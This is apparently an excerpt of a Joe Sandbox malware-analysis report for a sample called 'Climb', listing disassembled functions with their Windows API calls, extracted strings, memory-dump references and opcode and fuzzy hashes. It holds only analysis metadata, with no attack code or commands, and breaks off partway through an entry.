Instruction ID: bfc6f39d1375f69112267f4cd1def6cadf4c9e6ebf766bac2a434c0de580158d
Opcode Fuzzy Hash: 5e7b18f0d3a0fcedf631b5f849dd0936bb785acc8fa0023f58467295b6cc0b8c
Instruction Fuzzy Hash: C601D6B220929A7EFA71267A7CC0F6B678DDF817B8B354725F921B11D3DE608C808160

Function 00112374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00112394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 001123A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 001123BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 001123D7

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d6a020cdfc314bc59de239e0c53703bcd0f0d803ef3534a0ce5f65f3af47f369
Instruction ID: 8ac63115d8efef85eb6f8356fa1a7af55b5586a0165994a80ef7a30a56f9f02f
Opcode Fuzzy Hash: d6a020cdfc314bc59de239e0c53703bcd0f0d803ef3534a0ce5f65f3af47f369
Instruction Fuzzy Hash: 4A11F73A900228FFEB159BA5CD85FDDBB78FB08750F2000A1EA11B7290D7716E60DB94

Function 000B1AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 000B1AF4
GetClientRect.USER32(?,?), ref: 000F31F9
GetCursorPos.USER32(?), ref: 000F3203
ScreenToClient.USER32(?,?), ref: 000F320E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: ad0903aabc425872064fd77ceeda2bd25b927abb3b69919d1da3b5989e04dda6
Instruction ID: f353da22888e6277f35706f1f98e21cfa43208dcab63a06ea5e055349738e891
Opcode Fuzzy Hash: ad0903aabc425872064fd77ceeda2bd25b927abb3b69919d1da3b5989e04dda6
Instruction Fuzzy Hash: D8114836A0101AEBCF10DFA8D9859FE77B8FB05354F500452EA02E3551D770BA91DBA2

Function 0011EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0011EB14
MessageBoxW.USER32(?,?,?,?), ref: 0011EB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0011EB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0011EB64

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 5b1563e93e161767b2e723a0ad259021ea2f8b936c8f0a220fb58ee56b9f7f81
Instruction ID: 5daf9b524b63c41ef56f29da401f4a79d026f3692e23d440f15b7b878b0a8e75
Opcode Fuzzy Hash: 5b1563e93e161767b2e723a0ad259021ea2f8b936c8f0a220fb58ee56b9f7f81
Instruction Fuzzy Hash: 1311DB76A04258BBCB059FE8AC05ADE7FADBB47310F144266FC15D3691D7748A848760

Function 000DD53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,000DD369,00000000,00000004,00000000), ref: 000DD588
GetLastError.KERNEL32 ref: 000DD594
__dosmaperr.LIBCMT ref: 000DD59B
ResumeThread.KERNEL32(00000000), ref: 000DD5B9

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: ddece91e02d0d4d68e87e2c71bfe75696abb7ce86a0a25a0748836d6091fbe6b
Instruction ID: 617858f82f5ff1bc2d1e0151984d65bb66bcb8365ebe9bc4ece12726cef777a5
Opcode Fuzzy Hash: ddece91e02d0d4d68e87e2c71bfe75696abb7ce86a0a25a0748836d6091fbe6b
Instruction Fuzzy Hash: 9701C076504714BBCB206FA5FC05BAA7B69EF82734F10021BF925862E0CB709940C6B1

Function 000B7873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000B78B1
GetStockObject.GDI32(00000011), ref: 000B78C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 000B78CF

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: ed5671c0071d602893872a26243b2b4463f5cfbafcf6731cd063fcb2b4137b22
Instruction ID: 5c02446fa826c11248b6ea1a7457ef797cfc66efc3af8423b9f81515b5c69450
Opcode Fuzzy Hash: ed5671c0071d602893872a26243b2b4463f5cfbafcf6731cd063fcb2b4137b22
Instruction Fuzzy Hash: B211F572545108BFEF125F90DC58EEA7BADFF49368F040125FA0852120DB31DCA0EBA0

Function 000E33E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,000E338D,00000364,00000000,00000000,00000000,?,000E35FE,00000006,FlsSetValue), ref: 000E3418
GetLastError.KERNEL32(?,000E338D,00000364,00000000,00000000,00000000,?,000E35FE,00000006,FlsSetValue,00153260,FlsSetValue,00000000,00000364,?,000E31B9), ref: 000E3424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000E338D,00000364,00000000,00000000,00000000,?,000E35FE,00000006,FlsSetValue,00153260,FlsSetValue,00000000), ref: 000E3432

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 35b068c82576e2183e10b89da5678e715576ae866765c81586bb0e67c14154a7
Instruction ID: 448abf50d49f38a1d7414d2d2039eb9e5f732c29a0a6c523ce836b7084acdd9e
Opcode Fuzzy Hash: 35b068c82576e2183e10b89da5678e715576ae866765c81586bb0e67c14154a7
Instruction Fuzzy Hash: 4C01FC76711262AFCB324B7AAC48E563FD8BF45B617110220F916F75D0C720EE41C6E0

Function 0011BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0011B69A,?,00008000), ref: 0011BA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0011B69A,?,00008000), ref: 0011BAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0011B69A,?,00008000), ref: 0011BABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0011B69A,?,00008000), ref: 0011BAED

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 623502476026ba572c15b4b7341ba07d167332ec489e4b7f7eaf15c39484ff05
Instruction ID: 745dfa4e79a780be47f9d635bf1ffe3930d1f1a79ca52671baaf21381749f190
Opcode Fuzzy Hash: 623502476026ba572c15b4b7341ba07d167332ec489e4b7f7eaf15c39484ff05
Instruction Fuzzy Hash: 38115B31C04629E7CF08DFA5F9897EEBB78BF09B11F1140A9D941B3590CB309690CBA5

Function 0014886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0014888E
ScreenToClient.USER32(?,?), ref: 001488A6
ScreenToClient.USER32(?,?), ref: 001488CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001488E5

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: eff59a5ba8fe94da74445e340dcd49e5b96d37b18fc4ad2d3099d6022c22b428
Instruction ID: 2f75eb811ca0494803a8b37577ef7c9df3ccb70edcd427586f9bff23d17699a4
Opcode Fuzzy Hash: eff59a5ba8fe94da74445e340dcd49e5b96d37b18fc4ad2d3099d6022c22b428
Instruction Fuzzy Hash: 051143B9D0020AAFDF41CF98D8849EEBBB5FB09310F504156E915E2660D735AA94CF50

Function 001136F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00113712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00113723
GetCurrentThreadId.KERNEL32 ref: 0011372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00113731

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 44cd3c938da52b85c1e02f7686a3167fca910badddfd4e4d85a2c80aaae798e5
Instruction ID: b9320af127524ba4328a159be98d27b4f917eea87d70bed0bdffca3dc6e18e23
Opcode Fuzzy Hash: 44cd3c938da52b85c1e02f7686a3167fca910badddfd4e4d85a2c80aaae798e5
Instruction Fuzzy Hash: 0FE06DB52012247ADA2417A2AC4EEEB7F6CDB43BA1F410025F509D24A0DAA489C0C2B0

Function 001492BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 000B1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000B1F87
Part of subcall function 000B1F2D: SelectObject.GDI32(?,00000000), ref: 000B1F96
Part of subcall function 000B1F2D: BeginPath.GDI32(?), ref: 000B1FAD
Part of subcall function 000B1F2D: SelectObject.GDI32(?,00000000), ref: 000B1FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001492E3
LineTo.GDI32(?,?,?), ref: 001492F0
EndPath.GDI32(?), ref: 00149300
StrokePath.GDI32(?), ref: 0014930E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: e5cec67bc2f97c170882aef9a9f3c35ee90003482de58ab16dcd45f0c3a71f72
Instruction ID: 2bf83ddce753581f96a01b6cd26f019db7ea2dd6c63160173eb877bab922b102
Opcode Fuzzy Hash: e5cec67bc2f97c170882aef9a9f3c35ee90003482de58ab16dcd45f0c3a71f72
Instruction Fuzzy Hash: 48F05E35105269BADF125F54AC0EFCE3F69AF0B724F048100FA11624F2C77556A1DBE5

Function 000B21A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 000B21BC
SetTextColor.GDI32(?,?), ref: 000B21C6
SetBkMode.GDI32(?,00000001), ref: 000B21D9
GetStockObject.GDI32(00000005), ref: 000B21E1

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 0d94c7d5b962a7809a698d9e0a1ec4b026eec223f8370cf52e80bb7c682ce7ab
Instruction ID: ef8331efcb2c8c1ba94405dbb650e84ebb2ffd214b595e17b9d62e1d1786a8e6
Opcode Fuzzy Hash: 0d94c7d5b962a7809a698d9e0a1ec4b026eec223f8370cf52e80bb7c682ce7ab
Instruction Fuzzy Hash: 1BE06D35240684AADF615B74BC09BEC3B61AB16736F048219FBBA984F0C7728680AB10

Function 0010EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0010EC36
GetDC.USER32(00000000), ref: 0010EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0010EC60
ReleaseDC.USER32(?), ref: 0010EC81

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: ba3b97ecbb48f8a2c11b6b04e723d864141f5eef49d36a5fd4a203b3664de3d5
Instruction ID: 5d0aca2036ab4c662d6b2db283a8f830e3cc714c3049955c350e267afff6527f
Opcode Fuzzy Hash: ba3b97ecbb48f8a2c11b6b04e723d864141f5eef49d36a5fd4a203b3664de3d5
Instruction Fuzzy Hash: 50E04F79C00204DFCF509FA0E908A9DBBF1FB08310F118419F84AE3660C7785982DF00

Function 0010EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0010EC4A
GetDC.USER32(00000000), ref: 0010EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0010EC60
ReleaseDC.USER32(?), ref: 0010EC81

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 2d282500254a62801ed5692fe086dfcc8ee26c7c4ca661b4940ac80ae9da360c
Instruction ID: 2983b25eb2469a5230a6223249def6f5ab1ecf2962dbae76603775eb20626275
Opcode Fuzzy Hash: 2d282500254a62801ed5692fe086dfcc8ee26c7c4ca661b4940ac80ae9da360c
Instruction Fuzzy Hash: 8CE046B8C00204EFCF509FA0E808A9DBBB1FB08310F118419F80EE3660CB386982DF00

Function 001257CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 000B41EA: _wcslen.LIBCMT ref: 000B41EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00125919

Strings

LPT, xrefs: 00125840
*, xrefs: 00125855

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 1c34e45fb3fe9391a178dc23be2613421c8b1d0e2b63a4f462544df69c34dda3
Instruction ID: 93d87257658ed060aea8b7631d5f5f0d34eb1a20ecf987dd88f5977e2a1e1640
Opcode Fuzzy Hash: 1c34e45fb3fe9391a178dc23be2613421c8b1d0e2b63a4f462544df69c34dda3
Instruction Fuzzy Hash: BD917C75A00614DFCB14DF54D4C5EAABBF2AF48308F198099E84A9F362C771EE85CB90

Function 000DE5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 000DE67D

Strings

pow, xrefs: 000DE655, 000DE672

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 1bb38090a8db83c9d0fa29ac3e06fea901ad4522de81f649b14ae1cad6c3b507
Instruction ID: c18222ca0037aacbf6aa4bceeabb60e74edd5049442c2f20fe994cb5c5b63bf6
Opcode Fuzzy Hash: 1bb38090a8db83c9d0fa29ac3e06fea901ad4522de81f649b14ae1cad6c3b507
Instruction Fuzzy Hash: 21517961E083818EC7617715CD013AA2BE8AB50B80F30CD9AF0995A3E9EF35CDD59B56

Function 000CA8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 000CA916

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 0e1d203186964dc5ce4ac410d8d7ce7e74ec9bce4056775976ba29b91b1065b3
Instruction ID: 8829ba51a76a221f011078c590cc672136271f58834e99abf27b194504e3c2de
Opcode Fuzzy Hash: 0e1d203186964dc5ce4ac410d8d7ce7e74ec9bce4056775976ba29b91b1065b3
Instruction Fuzzy Hash: 6051FF3160824A9FCB25DF28C881BFE7BA0EF16314F654059E8D2DB2D1DB749D82CB61

Function 000CF6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 000CF6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 000CF6F4

Strings

@, xrefs: 000CF6E8

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 6af478af1dce3cca83429bf1345c9a5519d89d90b9d325a43bc5c3724e3d3071
Instruction ID: b1c3eca720466ffa320de183a98f9e3496472e7f72001a2493c6c6f7568607f1
Opcode Fuzzy Hash: 6af478af1dce3cca83429bf1345c9a5519d89d90b9d325a43bc5c3724e3d3071
Instruction Fuzzy Hash: 745139719087489BD320AF10DC86BEBB7ECFB84300F81885DF1D9521A2EB708569CB66

Function 001361A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 0013623D
_wcslen.LIBCMT ref: 00136249

Strings

CALLARGARRAY, xrefs: 00136243, 00136248

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: d70042b8a8e222fd526283bc1e3da2c95e243147663892ab623d2e7ef0682bd8
Instruction ID: b3a8a0127ad3c0bb766a5eff25c46bfd9ca8e0895118e5f024ab910ff2ea1450
